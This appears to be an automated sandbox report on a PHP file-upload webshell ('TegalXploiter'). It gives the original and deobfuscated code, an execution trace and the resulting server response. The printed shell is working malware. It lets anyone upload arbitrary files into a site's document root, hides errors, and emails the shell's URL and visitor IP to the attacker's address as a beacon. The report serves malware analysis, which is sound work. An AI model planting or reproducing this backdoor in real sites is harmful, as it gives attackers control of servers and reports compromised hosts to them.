PHP Malware Analysis

%.php

md5: 1ee6ef53948b0c1d4ca33656adaa4ffa

Jump to: 

Screenshot
Attributes
Emails

Environment

Files

Input

Title

URLs
  • http://localhost/uploads/%25.php (Traces)

Deobfuscated PHP code
//Powered By Mr.Colded X Mr.Cold//
//Team : 3RROR YOUR SYSTEM //
<title>Home - Root Uplpader </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="red" size="5">> TegalXploiter <</font>
<font color="green"></center><br><br>
    <center>
<?php 
$uploaddir = 'C:/xampp/htdocs/kampungkb/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
echo "home uploader<br>";
echo "<b>" . php_uname() . "</b><br>";
echo "<form method='post' enctype='multipart/form-data'>\n      <input type='file' name='idx_file'>\n      <input type='submit' name='upload' value='Upload'>\n      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "Sukses Cok! -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>{$files}</b> Di Folder Ini";
        } else {
            echo "Gagal uplod";
        }
    }
}
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
Execution traces
data/traces/1ee6ef53948b0c1d4ca33656adaa4ffa_trace-1676258570.1289.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:23:16.026702]
1	0	1	0.000259	393480
1	3	0	0.000378	406504	{main}	1		/var/www/html/uploads/%.php	0	0
1		A						/var/www/html/uploads/%.php	11	$uploaddir = 'C:/xampp/htdocs/kampungkb/'
2	4	0	0.000433	406504	basename	0		/var/www/html/uploads/%.php	12	1	NULL
2	4	1	0.000447	406568
2	4	R			''
1		A						/var/www/html/uploads/%.php	12	$uploadfile = 'C:/xampp/htdocs/kampungkb/'
2	5	0	0.000477	406504	php_uname	0		/var/www/html/uploads/%.php	14	0
2	5	1	0.000491	406616
2	5	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/%.php	19	$root = '/var/www/html'
1		A						/var/www/html/uploads/%.php	20	$files = NULL
1		A						/var/www/html/uploads/%.php	21	$dest = '/var/www/html/'
2	6	0	0.000553	406544	ini_set	0		/var/www/html/uploads/%.php	40	2	'output_buffering'	0
2	6	1	0.000568	406616
2	6	R			FALSE
2	7	0	0.000582	406544	ini_set	0		/var/www/html/uploads/%.php	41	2	'display_errors'	0
2	7	1	0.000596	406616
2	7	R			''
2	8	0	0.000609	406544	set_time_limit	0		/var/www/html/uploads/%.php	42	1	0
2	8	1	0.000623	406608
2	8	R			FALSE
2	9	0	0.000636	406576	ini_set	0		/var/www/html/uploads/%.php	43	2	'memory_limit'	'64M'
2	9	1	0.000650	406680
2	9	R			'128M'
2	10	0	0.000664	406576	header	0		/var/www/html/uploads/%.php	44	1	'Content-Type: text/html; charset=UTF-8'
2	10	1	0.000680	406752
2	10	R			NULL
1		A						/var/www/html/uploads/%.php	45	$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com'
1		A						/var/www/html/uploads/%.php	46	$x_path = 'http://localhost/uploads/%25.php'
1		A						/var/www/html/uploads/%.php	47	$pesan_alert = 'fix http://localhost/uploads/%25.php :p *IP Address : [ 127.0.0.1 ]'
2	11	0	0.000732	406920	mail	0		/var/www/html/uploads/%.php	48	4	'tangsel1928@gmail.com, tangsel1928@gmail.com'	'LOGGER'	'fix http://localhost/uploads/%25.php :p *IP Address : [ 127.0.0.1 ]'	'[ 127.0.0.1 ]'
2	11	1	0.001641	407064
2	11	R			FALSE
1	3	1	0.001704	406880
			0.001746	314832
TRACE END   [2023-02-13 01:23:16.028308]


Generated HTML code
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br>
</p>
<hr>
<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>

</body></html>
Original PHP code
//Powered By Mr.Colded X Mr.Cold//
//Team : 3RROR YOUR SYSTEM //
<title>Home - Root Uplpader </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="red" size="5">> TegalXploiter <</font>
<font color="green"></center><br><br>
    <center>
<?php
$uploaddir = 'C:/xampp/htdocs/kampungkb/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
echo "home uploader<br>";
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
      <input type='file' name='idx_file'>
      <input type='submit' name='upload' value='Upload'>
      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo "Sukses Cok! -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>$files</b> Di Folder Ini";
        } else {
            echo "Gagal uplod";
        }
    }
}
?>
<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>